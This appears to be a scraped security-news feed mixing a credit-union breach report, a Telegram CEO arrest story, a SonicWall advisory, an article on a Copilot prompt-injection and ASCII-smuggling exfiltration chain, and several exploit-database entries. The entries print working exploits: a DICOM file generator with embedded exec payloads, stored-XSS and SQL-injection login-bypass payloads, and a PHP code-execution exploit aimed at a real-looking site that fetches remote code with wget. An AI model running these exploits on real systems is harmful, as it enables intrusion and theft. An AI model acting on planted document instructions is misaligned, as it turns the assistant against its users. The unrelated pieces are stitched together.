The Texas Dow Employees Credit Union (TDECU) has disclosed a data breach of 500,474 people, related to the MOVEit vulnerability.

The Texas Dow Employees Credit Union (TDECU) has filed a data breach notification, reporting that the data of 500,474 people has been accessed in an external system breach.

TDECU is the largest Houston-area credit union, and the fourth largest in the state of Texas. The credit union was founded by employees of Dow Chemical Company in December 1954 and membership was initially limited to Dow and Ethyl-Dow employees. Since then it has gone through several mergers and acquisitions

According to the data breach notification, the breach occurred on May 29, 2023, but wasn’t discovered until July 30, 2024.

TDECU has sent personal notifications to those individuals it suspects might have been affected. In this notification and on its website, TDECU explained that the incident was related to the MOVEit vulnerability that impacted many other organizations last year. Due to the attacks that used this vulnerability, over 20 million individuals were impacted, says TDECU. The vulnerability also allowed the attackers to view or take certain TDECU data.

> “There was no compromise of TDECU’s broader network security.”

After learning of the vulnerability, TDECU launched an investigation and found that certain files containing personal information of TDECU members were potentially stolen from MOVEit by cybercriminals between May 29 and 31, 2023.

Affected individuals are being offered complimentary access to identity monitoring for 12 months.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

 TDECU data breach affects half a million people 

Details have emerged about a now-patched vulnerability in Microsoft 365 Copilot that could enable the theft of sensitive user information using a technique called ASCII smuggling.
"ASCII Smuggling is a novel technique that uses special Unicode characters that mirror ASCII but are actually not visible in the user interface," security researcher Johann Rehberger said.
"This means that an attacker

AI Security / Vulnerability

Details have emerged about a now-patched vulnerability in Microsoft 365 Copilot that could enable the theft of sensitive user information using a technique called ASCII smuggling.

"ASCII Smuggling is a novel technique that uses special Unicode characters that mirror ASCII but are actually not visible in the user interface," security researcher Johann Rehberger said.

"This means that an attacker can have the \[large language model\] render, to the user, invisible data, and embed them within clickable hyperlinks. This technique basically stages the data for exfiltration!"

The entire attack strings together a number of attack methods to fashion them into a reliable exploit chain. This includes the following steps -

*   Trigger prompt injection via malicious content concealed in a document shared on the chat
*   Using a prompt injection payload to instruct Copilot to search for more emails and documents
*   Leveraging ASCII smuggling to entice the user into clicking on a link to exfiltrate valuable data to a third-party server

The net outcome of the attack is that sensitive data present in emails, including multi-factor authentication (MFA) codes, could be transmitted to an adversary-controlled server. Microsoft has since addressed the issues following responsible disclosure in January 2024.

The development comes as proof-of-concept (PoC) attacks have been demonstrated against Microsoft's Copilot system to manipulate responses, exfiltrate private data, and dodge security protections, once again highlighting the need for monitoring risks in artificial intelligence (AI) tools.

The methods, detailed by Zenity, allow malicious actors to perform retrieval-augmented generation (RAG) poisoning and indirect prompt injection leading to remote code execution attacks that can fully control Microsoft Copilot and other AI apps. In a hypothetical attack scenario, an external hacker with code execution capabilities could trick Copilot into providing users with phishing pages.

Perhaps one of the most novel attacks is the ability to turn the AI into a spear-phishing machine. The red-teaming technique, dubbed LOLCopilot, allows an attacker with access to a victim's email account to send phishing messages mimicking the compromised users' style.

Microsoft has also acknowledged that publicly exposed Copilot bots created using Microsoft Copilot Studio and lacking any authentication protections could be an avenue for threat actors to extract sensitive information, assuming they have prior knowledge of the Copilot name or URL.

"Enterprises should evaluate their risk tolerance and exposure to prevent data leaks from Copilots (formerly Power Virtual Agents), and enable Data Loss Prevention and other security controls accordingly to control creation and publication of Copilots," Rehberger said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Fixes ASCII Smuggling Flaw That Enabled Data Theft from Microsoft 365 Copilot

French authorities detained Durov to question him as part of a probe into a wide range of alleged violations—including money laundering and CSAM—but it remains unclear if he will face charges.

French prosecutors gave preliminary information in a press release on Monday about the investigation into Telegram CEO Pavel Durov, who was arrested suddenly on Saturday at Paris’ Le Bourget airport. Durov has not yet been charged with any crime, but officials said that he is being held as part of an investigation “against person unnamed” and can be held in police custody until Wednesday.

The investigation began on July 8 and involves wide-ranging charges related to alleged money laundering, violations related to import and export of encryption tools, refusal to cooperate with law enforcement, and “complicity” in drug trafficking, possession and distribution of child pornography, and more.

The investigation was initiated by “Section J3” cybercrime prosecutors and has involved collaboration with France’s Centre for the Fight against Cybercrime (C3N) and Anti-Fraud National Office (ONAF), according to the press release. “It is within this procedural framework in which Pavel Durov was questioned by the investigators,” Paris prosecutor Laure Beccuau wrote in the statement.

Telegram did not respond to multiple requests for comment about the investigation but asserted in a statement posted to the company's news channel on Sunday that Durov has “nothing to hide.”

“Given the existence of several preliminary investigations in France concerning Telegram in relation to the protection of minors' rights and in cooperation with other French investigation units—for instance, on cyber harassment—the arrest of Durov, does not seem to me like a highly exceptional move,” says Cannelle Lavite, a French lawyer who specializes in free-speech matters.

Lavite notes that Durov is a French citizen who was arrested in French territory with an arrest warrant issued by French judges. She adds that the list of charges involved in the investigation is “extensive,” a wide net that she says is not entirely surprising in the context of “France's ambiguous legislative arsenal” meant to balance content moderation and free speech.

Durov is a controversial figure for his leadership of Telegram, in large part because he has not typically cooperated with calls to moderate the platform's content. In some ways, this has positioned him as a free-speech defender against government censorship, but it has also made Telegram a haven for hate speech, criminal activity, and abuse. Additionally, the platform is often billed as a secure communication tool, but much of it is open and accessible by default.

“Telegram is not primarily an encrypted messenger; most people use it almost as a social network, and they’re not using any of its features that have end-to-end encryption,” says John Scott-Railton, senior researcher at Citizen Lab. “The implication there is that Telegram has a wide range of abilities and access to potentially do content moderation and respond to lawful requests. This puts Pavel Durov very much in the center of all kinds of potential governmental pressure.”

On top of all of this, many researchers have questioned whether Telegram's end-to-end encryption is durable when users do elect to enable it.

French president Emmanuel Macron said in a social media post on Monday that “France is deeply committed to freedom of expression and communication … The arrest of the president of Telegram on French soil took place as part of an ongoing judicial investigation. It is in no way a political decision.”

News of Durov's arrest is fueling concerns, though, that the move could threaten Telegram's stability and undermine the platform. The case seems poised, too, to have implications in long-standing debates around the world about social media moderation, government influence, and use of privacy-preserving end-to-end encryption.

Lavite says the case certainly invokes debates about “the balance between the right to encrypted communication and free speech on the one hand, and users' protection—content moderation—on the other hand.” But she notes that there is a lot of information about the investigation that is unknown and “a lot of blurry zones still.”

On Monday afternoon, Telegram seemed to be receiving a download boost from the situation, moving from 18th to 8th place in Apple's US App Store apps ranking. Global iOS downloads were up by 4 percent, and in France the app was number one in the App Store social network category and number three overall.

Telegram CEO Pavel Durov’s Arrest Linked to Sweeping Criminal Investigation

Invesalius versions 3.1.99991 through 3.1.99998 suffer from a remote code execution vulnerability. The exploitation steps of this vulnerability involve the use of a specifically crafted DICOM file which, once imported inside the victim's client application, allows an attacker to gain remote code execution.

    # Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE)# Discovered By: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)# Exploit Author: Riccardo Degli Esposti (partywave), Alessio Romano (sfoffo)# Vendor Homepage: https://invesalius.github.io/# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius# Version: 3.1.99991 to 3.1.99998# Tested on: Windows# CVE-ID: CVE-2024-42845# External references: https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan, https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845#### exploit to create the malicious DICOM file###import pydicomimport base64import argparsepydicom.config.settings.reading_validation_mode = pydicom.config.IGNOREdef encode_payload(plain_payload):    data = open(plain_payload, 'rb').read()    return f"exec(__import__('base64').b64decode({base64.b64encode(data)})"def prepare_dicom_payload(dicom_file_path, sign, payload):    try:        dicom_data = pydicom.dcmread(dicom_file_path)        if sign:            dicom_data.Manufacturer = "Malicious DICOM file creator"            dicom_data.InstitutionName = "Malicious DICOM file institution"        values = dicom_data[0x0020, 0x0032].value        mal = [str(i) for i in values]        mal.append(encode_payload(payload))            except pydicom.errors.InvalidDicomError:        print("The file is not a valid DICOM file.")    except Exception as e:        print(f"An error occurred: {e}")        return maldef modify_dicom_field(dicom_file_path, malicious_tag, outfile):    try:        dicom_dataset = pydicom.dcmread(dicom_file_path)        elem =  pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag)        dicom_dataset[0x00200032] = elem        print(dicom_dataset)        dicom_dataset.save_as(outfile)    except Exception as e:        print(f"An error occurred: {e}")if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Read a DICOM file.')    parser.add_argument('--dicom', required=True, help='Path to the input DICOM file')    parser.add_argument('--outfile', required=True, help='Path to the output DICOM file')    parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code')    parser.add_argument('--signature', required=False, default=True)        args = parser.parse_args()    dicom_infile_path = args.dicom    dicom_outfile_path = args.outfile        tmp_tag = prepare_dicom_payload(dicom_infile_path, sign=args.signature, payload=args.payload)    if tmp_tag:        malicious_tag = '\\'.join(tmp_tag)        modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path)        exit(0)    else:        exit(1)

Invesalius 3.1 Remote Code Execution

Calibre Web version 0.6.21 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored XSS in Calibre-web# Date: 07/05/2024# Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache)# Vendor Homepage: (https://github.com/janeczku/calibre-web/)# Version: 0.6.21 - Romesa# Tested on: Linux 5.15.0-107, Python 3.10.12, lxml  4.9.4# CVE: CVE-2024-39123## Vulnerability DescriptionCalibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.## Steps to Reproduce1. Log in to the application.2. Upload a new book.3. Access the Books List functionality from the `/table?data=list&sort_param=stored` endpoint.4. In the `Comments` field, input the following payload:    <a href=javas%1Bcript:alert()>Hello there!</a>4. Save the changes.5. Upon clicking the description on the book that was created, in the Book Details, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.

Calibre Web 0.6.21 Cross Site Scripting

Helpdeskz version 2.0.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored XSS Vulnerability via File Name# Google Dork: N/A# Date: 08 Aug 2024# Exploit Author: Md. Sadikul Islam# Vendor Homepage: https://www.helpdeskz.com/# Software Link:https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip# Version: v2.0.2# Tested on: Kali Linux /  Firefox 115.1.0esr (64-bit)# CVE : N/APayload: "><img src=x onerror=alert(1);>Filename can be Payload: "><img src=x onerror=alert(1);>.jpgVIdeo PoC:https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_linkSteps to Reproduce:    1. Log in as a regular user and create a new ticket.    2. Fill out all the required fields with the necessary information.    3. Attach an image file with a malicious payload embedded in thefilename.    4. Submit the ticket.    5. Access the ticket from the administration panel to trigger thepayload execution.Cross-Site Scripting (XSS) exploits can compromise the administrationpanel, directly affecting administrators by allowing malicious scripts toexecute within their privileged environment.

Helpdeskz 2.0.2 Cross Site Scripting

SPIP version 4.2.11 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.11 PHP Code execution Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("wget https://raw.githubusercontent.com/indoushka/Mari/master/install.php");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.11 Code Execution

Loan Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Loan Management System 1.0 Auth By Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] USe Payload : User&Pass = ' or 0=0 ##[+] http://127.0.0.1/loan/index.php?page=homeGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Loan Management System 1.0 SQL Injection

SonicWall has released security updates to address a critical flaw impacting its firewalls that, if successfully exploited, could grant malicious actors unauthorized access to the devices.
The vulnerability, tracked as CVE-2024-40766 (CVSS score: 9.3), has been described as an improper access control bug.
"An improper access control vulnerability has been identified in the SonicWall SonicOS

Vulnerability / Enterprise Security

SonicWall has released security updates to address a critical flaw impacting its firewalls that, if successfully exploited, could grant malicious actors unauthorized access to the devices.

The vulnerability, tracked as **CVE-2024-40766** (CVSS score: 9.3), has been described as an improper access control bug.

"An improper access control vulnerability has been identified in the SonicWall SonicOS management access, potentially leading to unauthorized resource access and in specific conditions, causing the firewall to crash," the company said in an advisory released last week.

"This issue affects SonicWall Firewall Gen 5 and Gen 6 devices, as well as Gen 7 devices running SonicOS 7.0.1-5035 and older versions."

The issue has been addressed in the below versions -

*   SOHO (Gen 5 Firewalls) - 5.9.2.14-13o
*   Gen 6 Firewalls - 6.5.2.8-2n (for SM9800, NSsp 12400, and NSsp 12800) and 6.5.4.15.116n (for other Gen 6 Firewall appliances)

SonicWall said the vulnerability is not reproducible in SonicOS firmware version higher than 7.0.1-5035, although it's recommended that users install the latest firmware.

The networking equipment vendor makes no mention of the flaw being exploited in the wild. That said, it's imperative that users take steps to quickly apply the patches to safeguard against potential threats.

Last year, Google-owned Mandiant revealed that a suspected China-nexus threat actor tracked as UNC4540 targeted unpatched SonicWall Secure Mobile Access (SMA) 100 appliances to drop Tiny SHell and establish long-term persistence.

Various China-linked activity clusters have increasingly shifted operations to focus on edge infrastructure to breach targets and main remote access without attracting any attention.

This includes an intrusion set dubbed Velvet Ant that was recently discovered leveraging a zero-day exploit against Cisco Switch appliances to propagate a new malware called VELVETSHELL, a hybrid customized version of Tiny SHell and 3proxy.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SonicWall Issues Critical Patch for Firewall Vulnerability Allowing Unauthorized Access

Jobs Finder System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Jobs Finder System v1.0 XSS injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Jobs_Finder_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /job.php?id=5'%22()%26%25<acx><ScRiPt%20>prompt(966215)</ScRiPt>[+] http://127.0.0.1/jobportal-master/job.php?id=5'%22()%26%25<acx><ScRiPt%20>prompt(966215)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#auth